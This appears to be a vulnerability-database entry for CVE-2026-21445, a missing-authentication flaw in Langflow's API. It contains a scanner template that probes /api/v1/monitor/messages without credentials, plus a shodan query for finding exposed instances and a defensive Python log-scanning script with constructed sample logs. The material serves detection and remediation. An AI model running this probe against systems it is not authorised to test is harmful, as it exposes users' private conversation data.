Langflow - Broken Access Control
CVE-2026-21445
Verified
Description
Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.7.0.dev45, multiple critical API endpoints in Langflow are missing authentication controls. The issue allows any unauthenticated user to access sensitive user conversation data, transaction histories, and perform destructive operations including message deletion. This affects endpoints handling personal data and system operations that should require proper authorization.
Severity
Critical
CVSS Score
9.1
Exploit Probability
12%
Affected Product
langflow
Published Date
March 25, 2026
Template Author
dhiyaneshdk
CVE-2026-21445.yaml
id: CVE-2026-21445

info:
  name: Langflow - Broken Access Control
  author: DhiyaneshDk
  severity: critical
  description: |
    Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.7.0.dev45, multiple critical API endpoints in Langflow are missing authentication controls. The issue allows any unauthenticated user to access sensitive user conversation data, transaction histories, and perform destructive operations including message deletion. This affects endpoints handling personal data and system operations that should require proper authorization.
  remediation: Update to version 1.7.0.dev45 or later.
  impact: |
    Unauthenticated attackers can access sensitive user data and perform destructive actions, risking data loss and privacy breaches.
  reference:
    - https://github.com/langflow-ai/langflow/security/advisories/GHSA-c5cp-vx83-jhqx
    - https://nvd.nist.gov/vuln/detail/CVE-2026-21445
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2026-21445
    cwe-id: CWE-306
    epss-score: 0.11673
    epss-percentile: 0.93762
  metadata:
    verified: true
    max-request: 1
    vendor: langflow-ai
    product: langflow
    shodan-query: html:"Langflow"
  tags: cve,cve2026,langflow,auth-bypass,unauth,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/monitor/messages"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"text":'
          - '"timestamp":'
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022035e667dd1c1037c81deda09bd7355c3ba15e111314f19b61f3f23a5cc5e8eb2b022100d35e87b6feb53fe7a86b68d426a2ddad8323ae904e19c51765639ff4a79ff4cd:922c64590222798bb761d5b6d8e72950
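The template above confirms exposure with a single unauthenticated GET to /api/v1/monitor/messages. As an added defender-side example (not part of the template and not Langflow's own code), the stdlib-only Python script below scans access logs for successful requests to the monitor API that carried no credentials, which on an instance at 1.7.0.dev45 or later should never succeed. It assumes a constructed log format whose last field, auth=yes|no, records whether an Authorization or x-api-key header was present, and treats everything under /api/v1/monitor/ as sensitive, which is an assumption that goes beyond the one path the template probes.

```python
import re

# Assumption: the affected endpoints live under this prefix; the template itself
# probes only /api/v1/monitor/messages.
SENSITIVE_PREFIX = "/api/v1/monitor/"

# Assumed (constructed) access-log format, one request per line:
#   <ip> [<time>] "<METHOD> <path> HTTP/x.y" <status> auth=<yes|no>
# auth= is a custom field recording whether Authorization or x-api-key was sent.
LOG_RE = re.compile(r'^(?P<ip>\S+) \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) '
                    r'(?P<path>\S+) [^"]*" (?P<status>\d{3}) auth=(?P<auth>yes|no)$')

def parse_line(line):
    """Return the parsed fields as a dict, or None for lines in another format."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def is_exposed_access(rec):
    """True when a credential-less request to a monitor endpoint succeeded (2xx).
    A patched instance (1.7.0.dev45 or later) should reject such requests, so a
    hit here means the instance is unpatched or its auth is misconfigured."""
    path = rec["path"].split("?", 1)[0]          # ignore query string
    return (path.startswith(SENSITIVE_PREFIX) and rec["auth"] == "no"
            and 200 <= int(rec["status"]) < 300)

def find_exposures(lines):
    """Scan log lines; return (ip, time, method, path, status) per exposed access."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec and is_exposed_access(rec):
            findings.append((rec["ip"], rec["time"], rec["method"],
                             rec["path"], int(rec["status"])))
    return findings

# Constructed sample log: two unauthenticated hits that must be flagged, an
# authenticated read, a correctly rejected request, and an unrelated endpoint.
SAMPLE_LOG = """\
203.0.113.7 [25/Mar/2026:10:01:02 +0000] "GET /api/v1/monitor/messages HTTP/1.1" 200 auth=no
203.0.113.7 [25/Mar/2026:10:01:05 +0000] "DELETE /api/v1/monitor/messages HTTP/1.1" 204 auth=no
10.0.0.5 [25/Mar/2026:10:02:00 +0000] "GET /api/v1/monitor/messages HTTP/1.1" 200 auth=yes
10.0.0.5 [25/Mar/2026:10:02:10 +0000] "GET /api/v1/monitor/messages HTTP/1.1" 401 auth=no
10.0.0.9 [25/Mar/2026:10:03:00 +0000] "GET /health HTTP/1.1" 200 auth=no
"""

if __name__ == "__main__":
    for ip, when, method, path, status in find_exposures(SAMPLE_LOG.splitlines()):
        print(f"{when} {ip} {method} {path} -> {status} without credentials")
```

Any finding from a reverse proxy in front of a production instance is worth treating as a confirmed data-exposure event, not just a patch reminder.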
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
CVE ID:
CVE-2026-21445
CWE ID:
CWE-306
Remediation Steps
Update to version 1.7.0.dev45 or later.